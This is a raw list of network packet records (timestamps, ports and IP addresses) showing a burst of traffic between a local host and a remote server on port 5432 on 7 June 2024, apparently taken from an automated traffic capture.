Jun 7, 2024 17:21:17.230616093 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.230650902 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.230664015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.230664015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.230722904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.231156111 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.231210947 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.231218100 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.231245995 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.231266975 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.231297016 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.231300116 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.231333017 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.231364012 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.231389046 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.232161045 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.232189894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.232239962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.232249022 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.232249022 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.232275009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.232292891 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.232309103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.232343912 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.232362032 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.232800961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.232853889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.232857943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.232887983 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.232923031 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.232938051 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.232938051 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.232975006 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.233594894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.233623981 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.233674049 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.233674049 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.233675003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.233716965 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.233750105 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.233767986 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.233767986 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.233803034 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.234255075 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.234306097 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.234332085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.234340906 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.234363079 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.234373093 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.234420061 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.234445095 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.234445095 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.234530926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.235292912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.235327005 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.235349894 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.235363960 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.235384941 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.235398054 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.235415936 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.235444069 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.235791922 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.235845089 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.235877991 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.235883951 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.235909939 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.235920906 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.235920906 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.236021042 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.236552000 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.236607075 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.236629009 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.236635923 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.236671925 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.236679077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.236706972 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.236709118 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.236757040 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.236757040 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.237556934 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.237610102 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.237613916 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.237643957 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.237669945 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.237678051 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.237725019 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.237725019 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.238169909 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.238203049 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.238229036 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.238255024 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.238259077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.238290071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.238322973 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.238337994 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.238337994 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.238379955 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.238740921 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.238770008 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.238790035 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.238814116 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.238823891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.238857985 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.238876104 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.238892078 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.238905907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.238945007 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.239526033 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.239581108 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.239617109 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.239639044 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.239639044 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.239661932 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.239670992 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.239701033 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.239734888 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.239747047 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.240618944 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.240674973 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.240684986 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.240709066 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.240741014 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.240753889 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.240753889 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.240818977 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.241513968 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.241543055 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.241584063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.241607904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.241976023 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.242003918 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.242042065 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.242106915 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.243040085 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.243093967 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.243127108 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.243141890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.243141890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.243164062 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.243185997 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.243194103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.243222952 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.243247032 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.244025946 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.244055986 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.244107962 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.244107962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.244107962 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.244143009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.244153023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.244179010 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.244201899 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.244235992 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.244235992 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.245131016 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.245189905 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.245197058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.245223999 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.245245934 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.245317936 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.246031046 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.246059895 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.246110916 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.246110916 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.246990919 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.247045994 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.247078896 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.247083902 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.247126102 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.247126102 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.247857094 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.247910976 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.247944117 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.247950077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.247971058 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.247987032 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.248956919 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.248990059 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.249017000 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.249023914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.249047995 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.249073982 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.249778032 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.249831915 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.249835968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.249882936 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.249886990 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.249917984 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.249937057 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.249949932 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.249970913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.250006914 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.250622988 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.250654936 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.250684977 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.250721931 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.251640081 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.251673937 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.251708984 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.251708984 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.251725912 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.251746893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.251768112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.251775980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.251792908 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.251852989 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.252574921 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.252669096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.252685070 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.252700090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.252744913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.252764940 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.253432035 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.253488064 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.253493071 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.253537893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.253572941 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.253586054 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.253586054 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.253602028 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.253635883 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.253663063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.254426956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.254456043 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.254484892 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.254508972 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.254538059 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.254558086 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.254558086 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.254591942 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.255264044 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.255320072 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.255325079 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.255351067 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.255381107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.255384922 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.255398989 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.255446911 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.256498098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.256526947 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.256618023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.256618023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.257360935 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.257390022 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.257421970 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.257441044 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.257471085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.257476091 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.257508039 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.257520914 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.257520914 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.257574081 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.257996082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.258024931 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.258075953 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.258075953 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.258867979 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.258898020 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.258943081 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.258949995 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.258979082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.259000063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.259000063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.259042025 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.259380102 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.259408951 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.259442091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.259460926 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.259464025 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.259495974 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.259517908 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.259529114 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.259546041 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.259577990 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.260196924 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.260226011 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.260253906 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.260260105 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.260283947 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.260294914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.260317087 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.260354996 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.261219978 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.261249065 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.261279106 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.261285067 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.261293888 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.261317968 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.261348009 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.261360884 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.261993885 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.262022972 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.262053013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.262124062 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.262835979 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.262890100 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.262904882 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.262919903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.262942076 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.262957096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.263006926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.263006926 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.263730049 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.263765097 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.263798952 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.263811111 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.263828993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.264281988 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.264527082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.264555931 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.264601946 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.264669895 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.264889002 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.264916897 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.264967918 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.264967918 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.265467882 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.265497923 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.265548944 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.265563965 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.265578985 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.265618086 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.265666008 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.266225100 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.266252995 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.266307116 CEST	5432	49716	116.202.190.18	192.168.2.5
